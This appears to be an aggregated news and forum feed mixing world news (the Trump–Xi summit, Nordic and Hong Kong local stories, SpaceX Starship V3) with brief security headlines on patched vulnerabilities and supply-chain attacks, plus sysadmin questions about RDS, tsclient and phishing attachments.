Most organizations today can point to a documented security or incident response plan. On paper, roles are assigned, actions are listed, and escalation paths are defined. Yet data from CIO Analytics shows that this documentation rarely translates into real readiness. Only 24 percent of organizations across Northern Europe practice their plans regularly. Denmark stands out with a higher share at 34 percent, but even here, a significant gap remains between having a plan and being prepared to use it under pressure.
AI is now part of everyday operations in many Danish organizations. Tools are deployed, pilots are running, and usage is widespread. Yet for many CIOs, one question remains unanswered: where is the business value? Denmark’s experience with AI highlights a growing gap between adoption and impact, where organizational choices matter more than technology itself.
"We have an ethical obligation to use technology because we know how much of a difference it can make," says Mikkel Solgaard Bojsen-Møller, Finance and Digitalization Director at Gentofte Municipality. Here, digitalization does not begin with the technology – but with the people it is intended to make a difference for: the citizens and the employees.
This report emphasizes the role of IT leadership as an active practice, where IT decision-makers are encouraged to function as strategic partners to businesses rather than merely serving as technical administrators.
CIO Analytics is an annual, data-driven survey designed to capture the priorities, challenges, and strategic direction of today’s IT decision-makers. First launched in Sweden in 2018, the survey has evolved into one of the most comprehensive studies of IT leadership in Northern Europe.
Public cloud is no longer evaluated solely on technical capability in Denmark. It is increasingly assessed through lenses of geopolitics, compliance, and political accountability. This shift marks a move from expansion to scrutiny, where cloud decisions signal governance maturity rather than technological ambition.
In Denmark, IT investment is not only a budget decision. It reflects confidence. The data shows that organizations increasing IT spend are more likely to view their IT organization as proactive. This relationship reveals a deeper dynamic. Proactivity builds trust. Trust unlocks investment. And investment, in turn, reinforces proactivity.
There were plenty of choreographed ceremonies but no sweeping trade breakthrough as Trump met Xi in Beijing.
On Wednesday evening last week, police were called to an address in Sveg over a suspected assault. A man in his 70s was taken for medical care and a woman was arrested. The man has now died, and the woman has been remanded in custody on suspicion of murder.
Parliamentary committee tells ministers the current online safety regime is failing children and warns 'no action is not an option'
President Xi Jinping’s new formula for China-US relations is “aspirational”, but the “real test” will be ensuring the two powers can work together despite their deepening rivalry, a leading Chinese political observer has cautioned. During his much-anticipated summit with US President Donald Trump in Beijing on Thursday, Xi said that the two leaders had “agreed on a new vision of building a constructive China-US relationship of strategic stability”, according to the official Chinese...
Most readers of foreign news pages this weekend will be assuming that US President Donald Trump’s summit with Chinese President Xi Jinping in Beijing has been dominating everyone’s attention. But across Asia, Trump, with his massive business entourage, was not the only act in town this week. At least two other major sets of meetings should not be overlooked. First, in New Delhi, Indian Prime Minister Narendra Modi was hosting foreign ministers from the 10 Brics economies and a growing community...
Africa's top health agency says around 246 cases have been reported.
Stephen Lin Er Chow, a physicist who designed a groundbreaking copper-free superconducting oxide capable of high-temperature superconductivity, has joined Zhejiang University from the National University of Singapore (NUS). Last year, at 27, Chow published the findings in the journal Nature, marking the first top-tier publication for the NUS lab since its establishment two decades ago. Confirming that he had joined Zhejiang University full-time, Chow said: “I really like Hangzhou’s living...
A new giant dinosaur weighing about 27 tonnes has been unearthed by researchers in Thailand, making it the largest ever found in Southeast Asia. According to a study published in the journal Scientific Reports on Thursday, the 27 metre (88 foot) long plant-eating beast is believed to have meandered through what is now Thailand between 100 and 120 million years ago. It likely weighed at least 10 tonnes more than Dippy the Diplodocus Thitiwoot Sethapanichsakul, lead researcher “Our dinosaur is big...
A high-severity privilege escalation vulnerability has been discovered in VMware Fusion, Broadcom’s popular macOS virtualization software, allowing local attackers to gain root-level access on affected systems. Tracked as CVE-2026-41702, the flaw was privately reported to Broadcom and patched on May 14, 2026, under security advisory VMSA-2026-0003. The vulnerability stems from a TOCTOU (Time-of-Check Time-of-Use) race […] The post VMware Fusion Vulnerability Let Attackers Escalate Privilege to Root appeared first on Cyber Security News.
Agencies said the risk to pupils and the wider public following the cases of meningitis remains low.
The regulator says the energy supplier breached licence conditions aimed at protecting customers in vulnerable situations.
The flight school's first class of fighter pilots trained on the new SK 40 trainer aircraft has now graduated.
Police in Region Mitt have received around 20 reports of counterfeit 500-krona banknotes. The fake notes have been found in, among other places, Gävle, Uppsala, Köping and Västerås.
On Friday, Thomas Stenström released the official World Cup song "Leva för alltid", but the chorus is not newly written. The same lyrics can be heard in his soundtrack to the Viaplay series "Leva life", released in 2023. "That's how it works," says the artist.
A state-aligned hacking group known as FrostyNeighbor has resurfaced with a fresh wave of cyberattacks targeting government organizations in Ukraine, using a carefully designed infection chain that is harder than ever to detect. The group, active since at least 2016, has a long history of targeting countries neighboring Belarus, and its latest campaign shows just […] The post Hackers Abuse Scheduled Tasks to Maintain Persistence in FrostyNeighbor Attacks appeared first on Cyber Security News.
Clearer boundaries, tougher requirements and a stronger rule of law: those were the topics in focus when Christian Democrats party leader Ebba Busch (KD) presented an "action plan against Islamism" at a press conference in Karlstad.
Hello, We are deploying a new environment where we have AD tiering in place: T2, T1 and T0. 95% of the users will have their daily work done on the RDS Farm/Collection, so the RDS Session Hosts are placed in Tier 2. We want the RDS Broker(s) to be placed in Tier 1, because it's somewhat the "management" of the RDS farm. The issue is that when deploying this collection, the user that is deploying it from the RDS broker needs to be local admin on the RDS Session Hosts, so we need a T1 user to be admin on T2 systems. That contradicts the AD tiering policy, where a T1 user shouldn't log in or be admin on a T2 system. Anybody got a solution for this? Other than moving the RDS broker(s) to T2. submitted by /u/ExamIll635
There is a great deal of user-generated content out there, from scripts and software to tutorials and videos, but we've generally tried to keep that off of the front page due to the volume and as a result of community feedback. There's also a great deal of content out there that violates our advertising/promotion rule, from scripts and software to tutorials and videos. We have received a number of requests for exemptions to the rule, and rather than allowing the front page to get consumed, we thought we'd try a weekly thread that allows for that kind of content. We don't have a catchy name for it yet, so please let us know if you have any ideas! In this thread, feel free to show us your pet project, YouTube videos, blog posts, or whatever else you may have and share it with the community. Commercial advertisements, affiliate links, or links that appear to be monetization-grabs will still be removed. submitted by /u/AutoModerator
Sweden's official World Cup song "Leva för alltid" has been released, and Thomas Stenström is behind it. Stenström had written the song before Sweden's decisive playoff match against Poland, which Sweden won 3-2. Hear what "Leva för alltid" sounds like and what Stenström thinks makes a good World Cup song.
Hello, junior sysadmin here (3rd month into working). So our company has jump servers so outside vendors can connect to our org's inner services using these jump servers. So usually they connect to the server and copy data from hard disks in the jump server's file explorer. But now this function for some reason stopped working. I also cannot do it when connecting with admin credentials. When I connect and click on the hard disk of my host machine, the error "\\tsclient is accessible. You might not have permission to use this network resource..." appears. At the same time, copying using the clipboard is working. The rdpclip.exe is also working. Could anyone explain how to solve this problem and even explain on a deeper level what tsclient is responsible for and how to troubleshoot this kind of problem? The other two Windows sysadmins are on vacation and this problem was given to me even though I am supposed to work only with Linux servers. Thanks everyone for your attention. I would really appreciate your help. submitted by /u/Fair-Wolf-9024
Malaysian Prime Minister Anwar Ibrahim’s ruling alliance will try to show a united front this weekend, but two former ministers from his own party are threatening to pull attention back to the fractures inside the reformist camp. Pakatan Harapan (PH), the reformist coalition led by Anwar, holds its first convention in four years in the southern state of Johor on Sunday. That same day, former economy minister Rafizi Ramli and former natural resources and environmental sustainability minister Nik...
Sidney Crosby is the biggest star of the entire Ice Hockey World Championship. In the opener, star-studded gold favourite Canada faces a young and hungry Tre Kronor. "I've seen a bit of them at the World Juniors," says Crosby.
Four of the Italians were part of a team from the University of Genoa.
Google has rolled out a massive security update for its Chrome browser, sealing a staggering 79 vulnerabilities before threat actors can exploit them. With 14 of these flaws rated as critical, browsing the web on an outdated version leaves your entire system wide open to devastating cyberattacks. The newest stable release bumps Chrome to 148.0.7778.167/168 […] The post 79 Chrome Vulnerabilities Patched, Including 14 Critical One’s – Update Now! appeared first on Cyber Security News.
Microsoft issued an urgent security alert regarding a newly discovered vulnerability in Exchange Server that is currently being exploited in the wild. Tracked as CVE-2026-42897, this critical spoofing flaw carries a high CVSS 3.1 severity score of 8.1 and directly impacts on-premises email infrastructure. Threat actors are actively exploiting this network-based weakness to compromise organizational […] The post Critical Microsoft Exchange Server Vulnerability Actively Exploited in Attacks appeared first on Cyber Security News.
Australia’s trade minister will visit China in an effort to shore up fuel supplies that have run short this year because of bottlenecks in the Strait of Hormuz during the US–Israeli war in Iran. Australian Trade and Tourism Minister Don Farrell told a press conference that he would travel to China to meet Commerce Minister Wang Wentao, after a stop in Japan on Monday. “Very much the topic of the day will be how do we continue to ensure reliable fuel supplies into this country,” Farrell said,...
The refresh resolves critical-severity use-after-free and other types of bugs in various browser components. The post Chrome 148 Update Patches Critical Vulnerabilities appeared first on SecurityWeek.
65 people have died and nearly 250 are reported to be infected in an outbreak of Ebola virus in northeastern Congo-Kinshasa. The African Union's disease control agency is now calling an international emergency meeting.
A high-severity vulnerability in Next.js threatens self-hosted web applications with severe data breaches. Threat actors can now exploit a Server-Side Request Forgery (SSRF) flaw to silently steal cloud credentials, harvest API keys, and access sensitive internal admin panels. Organizations running self-hosted Next.js environments must patch immediately to prevent attackers from pivoting into their internal networks. […] The post Critical Next.js Vulnerability Exposes Cloud Credentials, API keys, and Admin Panels appeared first on Cyber Security News.
Is it possible? Do you know success cases w/o spending 20+k $ on auditors? My customers bombard me with questions about certification of my app Perfect Wiki, I need help with finding the best way to show them that my app could be trusted. Comments URL: https://news.ycombinator.com/item?id=48145524 Points: 16 # Comments: 23
A gang leader from Gothenburg who had been held in custody on suspicion of murder and attempted murder in Västra Frölunda in September 2012 has been dropped from the investigation. "We can't get any further," says prosecutor Per-Erik Rinsell.
Russia says it was hit by a Ukrainian drone attack overnight, Reuters reports. In the city of Ryazan, south of Moscow, three people are said to have been killed and about ten injured in a drone attack in which multi-storey residential buildings and an industrial building were hit. An oil refinery is also said to have been hit.
The local media should contribute to “telling the ‘good stories of Hong Kong’” amid global turbulence as the city formulates its first five-year blueprint to align with national development, Chief Executive John Lee Ka-chiu has said. Speaking at an annual award ceremony organised by the Newspaper Society of Hong Kong on Friday, Lee said the local media was not only a witness and a recorder of events, but also needed to facilitate and contribute to the city’s and mainland China’s progress. “In...
A man who previously represented residents of fire-ravaged Wang Fuk Court in Tai Po has been arrested, along with his wife, on suspicion of conspiracy to defraud and money laundering, the South China Morning Post has learned. Sources revealed on Friday that Jason Kong Cheung-fat, a director of Ace Interior Design & Engineering Company, and his wife, Rosanna Cheung Yeuk-lan, who is also a director of the firm, were arrested a day earlier. The couple are suspected of borrowing hundreds of...
US President Donald Trump wrapped up his visit to China on Friday, the first by a US leader in nine years. The three-day trip, originally scheduled for March, had been postponed due to the Iran war. Following Trump’s departure, Russian leader Vladimir Putin will pay a one-day visit on Wednesday, the South China Morning Post reported exclusively. His trip will mark the first time Beijing has hosted the leaders of the two powers in the same month. Pakistan Prime Minister Shehbaz Sharif will...
Hong Kong must evolve beyond acting solely as a “superconnector” and reposition itself as a “super value-adder”, a leading think tank has said, urging the city to strengthen its role in global supply chains and align with national development amid geopolitical and technological shifts. In a 216-page report released on Friday, the 2022 Foundation – founded by Fung Group chairman Victor Fung Kwok-king – outlined a road map for Hong Kong’s next phase of economic growth. It highlighted the need for...
SpaceX has detailed major Starship V3 upgrades ahead of a launch targeted as early as May 19. The changes are meant to move Starship closer to its core goals: rapid reuse, Starlink deployment, orbital refueling, and eventually Moon and Mars missions. Longtime Slashdot reader schwit1 shares a report from Teslarati:

Here is an explicit, broken-down list of the key changes, first starting with the changes to Super Heavy V3:
- Grid Fin Redesign: Reduced from four fins to three. Each fin is now 50% larger and stronger, repositioned for better catching and lifting performance. Fins are lowered on the booster to reduce heat exposure during hot staging, with hardware moved inside the fuel tank for protection.
- Integrated Hot Staging: Eliminates the old disposable interstage shield. The booster dome is now directly exposed to upper-stage engine ignition, protected by tank pressure and steel shielding. Interstage actuators retract after separation.
- New Fuel Transfer System: Massive redesign of the fuel transfer tube -- roughly the size of a Falcon 9 first stage -- enables simultaneous startup of all 33 Raptors for faster, more reliable flip maneuvers.
- Engine Bay/Thermal Protection: Engine shrouds removed entirely; new shielding added between engines. Propulsion and avionics are more tightly integrated. CO2 fire suppression system deleted for a simpler, lighter aft section.
- Propellant Loading Improvements: Switched from one quick disconnect to two separate systems for added redundancy and reduced pad complexity.

Next, we have the changes to Starship V3:
- Completely Redesigned Propulsion System: Clean-sheet redesign supports new Raptor startup, larger propellant volume, and an improved reaction control system while reducing trapped or leaked propellant risk.
- Aft Section Simplification: Fluid and electrical systems rerouted; engine shrouds and large aft cavity deleted.
- Flap Actuation Upgrade: Changed from two actuators per flap to one actuator with three motors for better redundancy, mass efficiency, and lower cost.
- Faster Starlink Deployment: Upgraded PEZ dispenser enables quicker satellite release.
- Long-Duration Spaceflight Capability: New systems for long orbital coasts, orbital refueling, cryogenic fluid management, vacuum-insulated header tanks, and high-voltage cryogenic recirculation.
- Ship-to-Ship Docking + Refueling: Four docking drogues and dedicated propellant transfer connections added to support in-space refueling architecture.
- Avionics Upgrades: 60 custom avionics units with integrated batteries, inverters, and high-voltage systems (9 MW peak power). New multi-sensor navigation for precision autonomous flight. RF sensors measure propellant in microgravity. ~50 onboard camera views and 480 Mbps Starlink connectivity for low-latency communications.

"Believe it or not, there's more," writes schwit1. "Two years ago, the biggest and most powerful rocket ever flown was Starship V1. Last year, it was Starship V2. V3 is about to become the biggest and most powerful rocket ever flown -- but don't worry, the company already has plans for V4."
Mohammadi and Nordqvist stepped up away against Högvad (Alingsås Tidning)
South and Southeast Asian nations may emerge as unexpected clean energy beneficiaries after the Green Party of England and Wales made record-breaking gains in recent UK local council elections, according to analysts. The Greens expanded their footprint in the May 7 council elections, capitalising on widespread voter disillusionment with Britain’s two major parties, Labour and Conservative. It was the party’s best-ever performance in a local election. While Nigel Farage’s right-wing populist...
The US securities regulator had accused the Adanis of paying bribes and misleading investors, which they denied.
No major news has emerged from the meetings between Donald Trump and Xi Jinping. But both countries outwardly appear satisfied with the visit. "There are better conditions for communication between the countries in the future," says Asia correspondent Stefan Åsberg.
Niklas Jonsson replaces Anders Byström as national team manager. The Swedish Ski Association announced this in a press release. "I am both proud and honoured," says Jonsson.
Lazy weekend of Grand Prix fun turned into a terrifying all-nighter
The zero-day, tracked as CVE-2026-20182, has been exploited in targeted attacks by a sophisticated threat actor identified as UAT-8616. The post Cisco Patches Another SD-WAN Zero-Day, the Sixth Exploited in 2026 appeared first on SecurityWeek.
Before he even entered the race, Andy Burnham was the favourite to unseat Keir Starmer as Britain’s prime minister. The mayor of Greater Manchester led opinion polls and was the front runner among bookmakers and Polymarket. Late Thursday, the biggest obstacle fell away: Labour MP Josh Simons quit the House of Commons, clearing the way for Burnham to win a seat in Parliament, a requirement for the top job. Arriving in London this week as Starmer’s government wobbled, Burnham has kept a low...
Not so long ago, the internet debated how often men really think about the Roman Empire. When it comes to foreign policy debate, a question about ancient Greece would probably have been more relevant.
Microsoft has disclosed a new security vulnerability impacting on-premise versions of Exchange Server that it said has come under active exploitation in the wild. The vulnerability, tracked as CVE-2026-42897 (CVSS score: 8.1), has been described as a spoofing bug stemming from a cross-site scripting flaw. An anonymous researcher has been credited with discovering and reporting the issue. "
Police and rescue services have responded to an incident in Gamla stan in Stockholm. According to the rescue services, it involves a "bus leaking vehicle gas".
Beijing joins Mars club after ‘nine minutes of terror’ By William Zheng This article was first published on May 16, 2021 After seven months of space travel, three months in orbit and “nine minutes of terror”, China has become the third country in the world to safely land a rover on Mars. The China National Space Administration (CNSA) said its rover Zhu Rong – named after the Chinese god of fire and war – successfully landed on Mars yesterday after “nine minutes of terror”, referring...
216-square-metre villa in Alingsås sold (Alingsås Tidning)
121-square-metre house in Alingsås bought for 8,250,000 kronor (Alingsås Tidning)
Malaysia will not oppose a bid by a fugitive businessman involved in the massive 1MDB corruption scandal to seek a pardon from US President Donald Trump, Prime Minister Anwar Ibrahim said on Friday. Speaking to reporters during a visit to Seremban district, south of Kuala Lumpur, Anwar described the plea by Low Taek Jho as a “non-issue”. The businessman, better known as Jho Low, is formally seeking a “pardon after completion of sentence”, according to the US Department of Justice...
India's Prime Minister Narendra Modi is on a European tour, and on Sunday he comes to Gothenburg. The agenda includes deeper economic cooperation, because although India is one of the world's fastest-growing economies, the country needs more foreign investment. Despite India's rapid growth, inequality is wide, and the middle class, among others, has found things increasingly difficult. Divya Chettri is studying German and hopes to be able to move to Germany soon, she tells Sveriges Radio's South Asia correspondent.
A Chinese blogger drove 1,300km to take a fellow university student to her hometown to see her dead mother for the last time before her funeral. Both students are in grade four at North Minzu University in Yinchuan of Ningxia Hui Autonomous in northern China. On the evening of May 7, the female student was told that her mother had died suddenly. The reason for the mother’s death was not released, Dahe News reported. Since the female student’s home is located in a mountainous region, she had...
Japan’s quest for rare earth self-sufficiency and its drive to decouple from Chinese supply chains have prompted the government to consider building a dedicated deep-sea mining vessel to recover minerals from the Pacific Ocean floor. Local media reported that the ruling Liberal Democratic Party’s special committee on ocean development will soon present a draft proposal to the Takaichi administration, calling for unspecified project funding. While the initiative will face technological and...
A forklift rammed through the entrance of a gold shop in Strömstad overnight. The owner says items are missing, but what has been stolen, and where the forklift came from, is currently unclear. "We are in initial contact with companies that may know something about the forklift," says Johan Håkansson, police press spokesperson.
The Eurovision Song Contest is under way in Austria's capital right now, with the final tomorrow. But today Vienna also sees the opening of Wiener Festwochen, a cultural festival that has now existed for 75 years. The two events may in one sense seem to be each other's opposites, but much also unites them. Leonora Scheib, a dramaturge at Wiener Festwochen, thinks that multilingualism and a desire to bring nations together are what unite them.
Manages to get its hands on some Mac Studio machines before the OpenClaw machine grabs them
A 29-year-old Hong Kong man died of misadventure linked to a rare complication following a gastroscopy at a public hospital two years ago, an inquest has found. The Coroner’s Court on Friday ruled that Lui Pak-to died of cerebral oedema, or brain swelling, triggered by the procedure at Queen Mary Hospital in Pok Fu Lam on February 29, 2024. Coroner Raymund Chow Chi-wei cited expert evidence indicating it was undesirable that Lui had to wait four hours and 40 minutes for a brain scan after...
Chinese President Xi Jinping hosted the visiting US leader Donald Trump at Zhongnanhai in the heart of Beijing on Friday, the final day of Trump’s trip. Trees and roses The ancient trees and roses at Zhongnanhai drew Trump’s eye and sparked some light-hearted banter between the two leaders. As they strolled through the Chinese leaders’ compound, Xi pointed out ancient trees, some of them a few hundred years old. “They live that long?” Trump asked, a smiling Xi noting that some of the trees were...
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a newly disclosed vulnerability impacting Cisco Catalyst SD-WAN Controller to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to remediate the issue by May 17, 2026. The vulnerability is a critical authentication bypass tracked as CVE-2026-20182. It's
The papers are dominated by Sir Keir Starmer's fight to stay on as prime minister.
Hi, So I've started blocking htm and html attachments, because they are used in phishing mails and a colleague recently fell into this trap (.js was loaded, looking like a OneDrive page and then it went on from there). But a lot of mails we receive have mail history and signatures attached as htm files, alongside a lot of pretty much empty htm files. This looks to be Apple Mail on iOS and maybe macOS. All mails caught in this Anti-Malware policy need to be released by IT, hence IT gets a lot of release requests and the users' workflows are interrupted. We aim to release quickly, but this causes some friction. Customer-facing support is getting hit hard here, because a lot of customers use iPhones and the Apple Mail client. But then there are the B2B customers who auto-attach htm files, because... I have no clue actually, maybe old ERP systems? How do you all handle this? submitted by /u/SukkerFri
In southern Finland, residents were warned this morning about a potentially dangerous drone, and people living in the Nyland region were urged to stay indoors. According to the Defence Forces, fighter jets worked to locate the craft, which shortly after 6 o'clock is said to have crashed or been neutralised without any damage occurring. The Finnish Defence Forces write in a press release that Ukraine, in its defence against Russia, has carried out extensive drone attacks against Russia and that a single drone has entered Finland.
From Ricky Villa to Steven Gerrard, Ray Parlour to Roberto di Matteo - here are 10 of the best FA Cup final goals of all time.
The number of tourist arrivals in Hong Kong grew by 10 per cent year on year in April, bolstered by the city’s annual Sevens rugby tournament. The Tourism Board revealed on Friday that the city welcomed 4.21 million visitors in April, taking the total in the first four months to 18.52 million – a 15 per cent jump from the same period last year. While most visitors recorded in April were from mainland China, the number of tourists from the rest of the world also saw notable growth, rising by 8...
Tensions were already high on Wednesday night in the Philippine Senate, days after lawmakers abruptly ousted its leader and an ex-police chief wanted by the International Criminal Court showed up after six months in hiding. But few could guess at how suddenly terrifying things were going to get. Hours after wanted Senator Ronald dela Rosa had serenaded a group of reporters with the alma mater song of the Philippine Military Academy and declared his right to sanctuary from arrest in the building,...
As the jury deliberates, this is what we found out during the weeks-long trial with two tech titans at its heart.
An industry body survey found hotels in World Cup host cities see the tournament as a "non-event".
"Patriotic" UK anti-immigration social media accounts have been traced to Sri Lanka and Vietnam.
US President Donald Trump said he has secured “fantastic trade deals” during his high-stakes state visit to Beijing, as he met with his counterpart, President Xi Jinping, for a second day in Beijing. “This has been an incredible visit. I think a lot of, a lot of good has come of it. We’ve made some fantastic trade deals, great for both countries,” Trump said on Friday at Zhongnanhai, the Chinese central leadership compound. During the leaders’ meetings, Iran and the reopening of the Strait of...
I'm a Type 1 diabetic and software engineer. Last year I went months between endocrinologists with no clinician reviewing my data. I'm an engineer, so I built the tool I needed — and now I'm open sourcing it. GlycemicGPT is a self-hosted platform that connects continuous glucose monitors, insulin pumps, and existing Nightscout instances to an AI analysis layer running on your own infrastructure.

Data sources:
Dexcom G7 (cloud API)
Tandem t:slim X2 and Mobi pumps (direct BLE)
Nightscout (point it at your existing instance and you're running in minutes)

What the AI layer does:
Daily briefs summarizing overnight and 24-hour patterns
Meal response analysis
Conversational chat with RAG-backed clinical knowledge
Predictive alerting with configurable thresholds and caregiver escalation

Important: this is monitoring and analysis only. GlycemicGPT does not deliver insulin, does not control your pump, and is not a closed-loop system. It reads your data and gives you insight on top of it. Your clinical decisions stay between you and your care team.

Architecture:
Self-hosted via Docker or K8S — the GlycemicGPT stack runs entirely on your hardware
BYOAI — bring your own AI provider. Use Ollama for fully local operation (no data leaves your hardware), or point it at Claude, OpenAI, or any OpenAI-compatible endpoint if you prefer a hosted model. Data flows directly from your instance to the provider you choose; nothing is routed through any centralized service operated by the project.
GPL-3.0, no subscriptions, no vendor lock-in

Stack:
Backend API: FastAPI, Python 3.12, PostgreSQL 16, Redis 7
Web Dashboard: Next.js 15, React 19, Tailwind CSS, shadcn/ui
AI Sidecar: TypeScript, Express, multi-provider proxy
Android App: Kotlin, Jetpack Compose, BLE
Wear OS: Kotlin, Wear Compose, Watch Face Push API
Plugin SDK: Kotlin interfaces, capability-based, sandboxed

Looking for contributors — especially folks with BLE/Android experience or anyone in the diabetes tech space. Plugin SDK is documented if you want to add support for new devices.

GitHub: https://github.com/GlycemicGPT/GlycemicGPT Comments URL: https://news.ycombinator.com/item?id=48144670 Points: 4 # Comments: 0
Hong Kong residents can enjoy an 11-day-long holiday over the Easter and Ching Ming holidays in 2027 by applying for only four days of leave, according to the list of official public holidays released by authorities. The Hong Kong government on Friday gazetted the dates for public holidays in 2027, with residents enjoying at least seven long weekends next year. They can take advantage of the Christmas and New Year holidays at the end of 2026 to enjoy a 10-day-long holiday by applying for only...
It feels like the world's longest and most public divorce. At the end of April, Microsoft and OpenAI once again negotiated over the protracted dissolution of the relationship that has been under way between the two in recent years. At first glance it looks like a win-win situation. Broadly, OpenAI gets more freedom to steer its own course (it can, for example, sell its models to Microsoft competitors such as Amazon and Google), while Microsoft gets a better revenue deal and first rights to the latest OpenAI technologies over the coming decade. But in reality, one company got a better deal than the other. Who came out the winner? To find out, we first have to look at the most important details of the new agreement.

A new agreement after much bitterness

Remember that this new agreement did not come out of nowhere. It is a direct result of Microsoft's threat in March to sue OpenAI when it signed a deal worth 50 billion dollars with Amazon, which makes the latter company the only third-party cloud provider for OpenAI's enterprise platform for building and running AI agents. After the deal between Amazon and OpenAI was signed, Microsoft claimed that it violated its exclusive cloud agreement with OpenAI. A source inside Microsoft told the Financial Times: "We know our contract. We will sue them if they breach it. If Amazon and OpenAI want to bet on the creativity of their contract lawyers, I would bet on us, not on them." That led to negotiations and finally to an agreement between Microsoft and OpenAI that loosens the ties between the two companies, making it easier for them to go their own ways. It also changes the financial relationship between them considerably.

What OpenAI got

The agreement gave OpenAI what the company desperately wanted: a degree of independence from Microsoft. The biggest benefit for OpenAI is that the company can now sell its AI models through companies other than Microsoft, including on Google Cloud and Amazon Web Services. (Until now the models have only been available on Microsoft Azure.) With the new freedom, OpenAI can more easily chart its own course instead of letting Microsoft decide it. OpenAI also gets something crucial for its expected IPO: a final limit on how much money it must pay to Microsoft. OpenAI now pays 20 percent of its revenue to Microsoft. Under the new terms, OpenAI will continue paying until 2030, but the total amount of these payments will be capped. The companies have not disclosed what this cap is. The cap is crucial for OpenAI, because investors will be more inclined to buy OpenAI shares if the company's long-term profitability is not weighed down by payments to Microsoft.

What Microsoft got

Microsoft also gets a good deal. Although OpenAI can now sell to Microsoft's competitors, Microsoft remains OpenAI's primary cloud partner; OpenAI's products must ship on Azure before they become available from competitors. That gives Microsoft a significant "first to market" advantage, since its customers will get OpenAI's latest products before Amazon's and Google's customers. The agreement also extends Microsoft's hold on OpenAI's intellectual property until 2032. Microsoft has invested heavily in its own AI development, so when the exclusive agreement expires, Microsoft will probably no longer need it. The agreement will also do much to increase Microsoft's profit. The company no longer has to pay royalties to OpenAI for reselling OpenAI products on Azure. Instead, Microsoft now keeps all the revenue itself. And, as described above, Microsoft still gets 20 percent of OpenAI's revenue until the cap is reached. There is one last hidden benefit: the new arm's-length relationship between Microsoft and OpenAI makes it less likely that Microsoft could be prosecuted under antitrust laws in the US or abroad. The US Federal Trade Commission has already reviewed the relationship several times and issued a warning about potential antitrust violations. The FTC's then chair, Lina Khan, warned last year: "The FTC's report sheds light on how partnerships between big tech firms can create lock-in, deprive start-ups of key AI inputs, and reveal sensitive information that can undermine fair competition."

So who is the real winner?

Microsoft comes out the winner. The company no longer has to pay royalties to OpenAI, keeps first rights to the latest OpenAI technology, keeps exclusive rights to the AI company's intellectual property until 2032, and gets 20 percent of OpenAI's revenue until a cap is reached. In addition, the company is unlikely to be investigated for antitrust violations. On top of that, it is still a major shareholder in OpenAI, so it will share in OpenAI's successes. OpenAI admittedly gets benefits too, but they are nowhere near as significant as Microsoft's. It is yet another example of how Microsoft has used its relationship with OpenAI to kick-start its own AI capabilities and secure its future.
Russian leader Vladimir Putin will pay a one-day visit to Beijing, just days after President Xi Jinping wraps up his closely watched summit with his American counterpart Donald Trump. Sources told the South China Morning Post that the visit was expected to take place later next week, on May 20. They also said the visit was part of Moscow’s routine dealings with Beijing, with little expectation that there would be an elaborate parade or welcome. It will be the first time that China has hosted the...
Article URL: https://claude.com/blog/how-claude-code-works-in-large-codebases-best-practices-and-where-to-start Comments URL: https://news.ycombinator.com/item?id=48144494 Points: 159 # Comments: 114
Article URL: https://dylan.gr/1775146616 Comments URL: https://news.ycombinator.com/item?id=48144490 Points: 43 # Comments: 28
Allows unprivileged users to read files owned by root. Affects all stable kernels as of 2026-05-14. PoC: https://github.com/0xdeadbeefnetwork/ssh-keysign-pwn Patch: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=31e62c2ebbfdc3fe3dbdf5e02c92a9dc67087a3a submitted by /u/Amomynou5
Too much bacteria linked to faeces found at almost all England's designated river bathing sites
On Friday, the meetings in Beijing between China's top leader Xi Jinping and US President Donald Trump conclude. According to Trump, China has promised not to send military equipment to Iran, but much is still unknown about any agreements between the leaders. Trump and Xi hold a final meeting behind closed doors on Friday morning, Chinese time, at the party headquarters Zhongnanhai, before the American president flies home.
We have selected seven stories from this week’s news across Hong Kong, mainland China, the wider Asia region and beyond that resonated with our readers and shed light on topical issues. 1. The message China wants to send by hosting Trump at Temple of Heaven In Chinese diplomacy, historic venues are rarely just backdrops, and are often interpreted as rich in symbolism, carrying messages about history and bilateral...
Anyone here have experience with this? Or are there any similar services out there? Due to recent price increases in the compute market, we couldn't replace the HPC cluster we currently have. The price is too much, so we are looking for a solution that won't need immediate capex. Our only strict requirement is that the hardware needs to be on-prem. submitted by /u/potatokube
In Finland, the Ministry of the Interior announces that the drone warning issued during the morning is now over. On Friday morning, residents in the southern parts of the country were urged to stay indoors after an alert about drones in the airspace over Nyland, where Helsinki, among other places, is located. Air traffic was temporarily halted, and the Finnish air defence and NATO aircraft are said to have patrolled the airspace during the morning.
Two employee devices at OpenAI were compromised in a sweeping software supply chain attack targeting TanStack npm, but the AI company confirmed no user data, production systems, or intellectual property were affected. On May 11, 2026 UTC, threat actors launched a campaign dubbed “Mini Shai-Hulud”, a coordinated supply chain offensive orchestrated by the TeamPCP extortion […] The post OpenAI Confirms Security Breach Via TanStack npm Supply Chain Attack appeared first on Cyber Security News.
Article URL: https://github.com/pike00/coldkey Comments URL: https://news.ycombinator.com/item?id=48144410 Points: 17 # Comments: 5
Since the Russian invasion of Ukraine, 306 Ukrainian patients have been treated in Swedish hospitals. At the start of the war, many cancer patients came to Sweden because they could not get a place in Ukrainian healthcare, given the strained situation with many war-wounded in Ukraine; now it is mainly burn victims who receive care in Sweden. At the Burn Centre at Akademiska sjukhuset in Uppsala, more and more people are now being treated who have been hit by drone attacks or explosions and suffered severe burns.
Article URL: https://www.tristandc.com/government/news-2026-05-11-airdrop.php Comments URL: https://news.ycombinator.com/item?id=48144380 Points: 102 # Comments: 19
At the same time as the CIA director visited Havana, word came that the US Department of Justice intends to indict Cuba's former president Raúl Castro. The Cuban government announced on Thursday that the country's oil reserves have run out and that Cuba will accept the 100 million dollar aid package offered by the US. President Miguel Díaz Canel wrote on X that the country is grateful, but that it would have been simpler for the US to lift its blockade of the island. In recent days, the Trump administration has toned down its threats of a military intervention in Cuba.
Ronda Rousey says she is "smashing the record" alongside Gina Carano for the "most women have been paid in combat sports" and she could become the most powerful figure in MMA since UFC president Dana White.
Andy Burnham, Angela Rayner and Wes Streeting are all potential candidates for the top job.
Starting today, the new national regulation against invasive species takes effect. For the municipalities, this means 34 new species that must now be eradicated, but for now there is no extra money to do the job. "It's going to be a tough fight," says Ola Sjösten, head of streets and parks in Tingsryd municipality.
